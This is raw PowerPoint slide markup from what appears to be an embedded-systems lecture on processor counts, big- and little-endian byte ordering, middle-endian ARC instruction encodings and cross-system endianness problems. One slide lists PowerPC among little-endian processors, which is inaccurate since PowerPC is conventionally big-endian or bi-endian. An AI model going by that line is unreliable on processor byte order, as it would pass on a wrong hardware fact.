              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</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_enable();</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 ... initialize </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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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main(</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argv</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="12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602319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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Endianness and Alignment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1912665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smtClean="0"/>
              <a:t>Embedded Systems in numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over      % of manufactured processors go to embedded systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                  embedded processors per year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Average car contains      processors, some models contain     (hybrid cars)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Average home has      processors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1600200"/>
            <a:ext cx="762000" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>99</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2667000"/>
            <a:ext cx="2057400" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>10 billion </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3276600"/>
            <a:ext cx="914400" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="4343400"/>
            <a:ext cx="914400" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3759200"/>
            <a:ext cx="914400" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>60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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Endianness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176131" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8458200" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Endianess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is the byte ordering used to represent integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2 types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: MSB of any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> data field is stored at the lowest memory address (“network order”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Little </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: LSB of any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> data field is stored at the lowest memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Little-endian processors: Intel, VAX, PowerPC, ARC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Big-endian processors: SPARC, Motorola 68K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40227517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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4100" dirty="0" smtClean="0"/>
              <a:t>Mix 16/32-bit Instructions results in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4100" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>middle-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4100" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>endian</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4100" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9219" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2362200"/>
            <a:ext cx="3597275" cy="3471863"/>
            <a:chOff x="288925" y="1862138"/>
            <a:chExt cx="4435475" cy="3929062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9222" name="Text Box 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="288925" y="1862138"/>
              <a:ext cx="3524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31</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9223" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4419600" y="1905000"/>
              <a:ext cx="268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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9224" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2133600"/>
              <a:ext cx="44196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69131" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304584" y="2133418"/>
              <a:ext cx="4419816" cy="53357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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Instruction A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9226" name="Group 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2667000"/>
              <a:ext cx="4419600" cy="533400"/>
              <a:chOff x="960" y="1872"/>
              <a:chExt cx="2784" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9234" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="960"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B</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9235" name="Rectangle 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2352"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C</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9227" name="Group 22"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="3200400"/>
              <a:ext cx="4419600" cy="533400"/>
              <a:chOff x="960" y="2208"/>
              <a:chExt cx="2784" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9232" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="960" y="2208"/>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D</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1669144" name="Rectangle 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2352" y="2208"/>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400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Instruction E (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>msb</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>)</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9228" name="Group 29"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="3733800"/>
              <a:ext cx="4419600" cy="533400"/>
              <a:chOff x="960" y="2544"/>
              <a:chExt cx="2784" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1669150" name="Rectangle 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="960" y="2544"/>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400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Instruction E (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>lsb</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9231" name="Rectangle 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2352" y="2544"/>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F</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1669156" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304584" y="4267723"/>
              <a:ext cx="4419816" cy="53357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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Instruction G</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2057400"/>
            <a:ext cx="449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add_s  %r1, %r0, 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>68 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>add_s  %r0, %r0, 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>E0 03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>j.d [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1800"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>blink] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>20 21 07 C0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>add_s  %r0, %r0, %r1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>60 38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92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52800"/>
            <a:ext cx="36004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445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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Endianness Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No problem on a single system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem happens when two systems use different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>endianness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and communicate (through network or a memory device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="4267200"/>
          <a:ext cx="5972175" cy="1817688"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s5160" name="Visio" r:id="rId4" imgW="5971794" imgH="1817751" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="5971794" imgH="18177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267200"/>
                        <a:ext cx="59721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42964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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Endianness Problems – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
